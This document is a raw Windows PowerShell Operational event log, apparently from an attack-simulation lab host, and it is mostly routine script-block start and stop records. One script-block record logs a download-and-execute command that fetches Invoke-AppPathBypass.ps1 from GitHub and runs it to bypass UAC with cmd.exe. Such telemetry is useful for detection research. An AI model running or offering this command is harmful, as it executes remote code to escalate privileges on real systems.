SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476107
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476106
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476105
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476104
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476103
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476102
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476101
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476100
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476099
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476098
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476097
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476096
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476095
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476094
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476093
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476092
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476091
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476090
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476089
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476088
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476087
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476086
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476085
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476084
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476083
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476082
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{(Item Variable:_).Value.id-ieq$curpid}

ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Path:
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476081
Keywords=None
Message=Completed invocation of ScriptBlock ID: 416a8667-7927-4fd5-90b4-01dd0206b6d7
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476080
Keywords=None
Message=Started invocation of ScriptBlock ID: 416a8667-7927-4fd5-90b4-01dd0206b6d7
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476079
Keywords=None
Message=Completed invocation of ScriptBlock ID: 416a8667-7927-4fd5-90b4-01dd0206b6d7
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476544
Keywords=None
Message=Completed invocation of ScriptBlock ID: e7c52d9d-6863-4770-bc5d-19b0f3fa8b3a
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476543
Keywords=None
Message=Started invocation of ScriptBlock ID: e7c52d9d-6863-4770-bc5d-19b0f3fa8b3a
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476542
Keywords=None
Message=Completed invocation of ScriptBlock ID: 25acadce-669c-453c-a738-3d74295ec844
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476541
Keywords=None
Message=Started invocation of ScriptBlock ID: 25acadce-669c-453c-a738-3d74295ec844
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476540
Keywords=None
Message=Started invocation of ScriptBlock ID: b75f6ba9-20f9-44ff-8180-71c741e69686
Runspace ID: a8f8b358-ae54-4bad-a615-808c755bdb28
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476539
Keywords=None
Message=Creating Scriptblock text (1 of 1):
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'

ScriptBlock ID: b75f6ba9-20f9-44ff-8180-71c741e69686
Path:
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1476538
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1476537
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 5812 in AppDomain: DefaultAppDomain.
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1476536
Keywords=None
Message=PowerShell console is starting up
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476535
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476534
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476533
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476532
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476531
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476530
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18ebddec-0fe6-48a4-b9f0-8a4bb38ec99e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476529
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9c6c5db8-4434-4099-96b7-7eff0b918e23
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476528
Keywords=None
Message=Started invocation of ScriptBlock ID: 9c6c5db8-4434-4099-96b7-7eff0b918e23
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476527
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c475cb-a102-49f4-9ba8-6dad019309a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476526
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c475cb-a102-49f4-9ba8-6dad019309a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476525
Keywords=None
Message=Completed invocation of ScriptBlock ID: 673f814b-b345-4289-bb3f-c47b813ab2b3
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476524
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476523
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476522
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476521
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476520
Keywords=None
Message=Started invocation of ScriptBlock ID: 673f814b-b345-4289-bb3f-c47b813ab2b3
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476519
Keywords=None
